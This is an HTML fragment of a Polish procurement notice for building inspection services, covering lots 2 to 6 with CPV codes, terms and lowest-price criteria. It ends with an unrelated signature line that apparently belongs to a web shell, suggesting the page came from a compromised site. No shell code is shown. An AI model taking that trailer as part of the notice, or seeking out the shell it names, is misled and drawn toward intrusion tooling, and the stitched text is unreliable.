<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kontrola roczna stanu technicznego budynku i kontrola pięcioletnia (przegląd budowlany i sanitarny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w pkt.II.1.4. niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.10.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kontrola roczna stanu technicznego budynku i kontrola pięcioletnia (przegląd budowlany i sanitarny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w pkt.II.1.4. niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.10.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kontrola 5-cio letnia stanu technicznego budynku (przegląd elektryczny) wraz z badaniem instalacji elektrycznej i piorunochronnej,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w pkt.II.1.4. niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.10.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kontrola 5-cio letnia stanu technicznego budynku (przegląd elektryczny) wraz z badaniem instalacji elektrycznej i piorunochronnej,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w pkt.II.1.4. niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.10.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kontrola 5-cio letnia -badanie instalacji elektrycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w pkt.II.1.4. niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.10.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com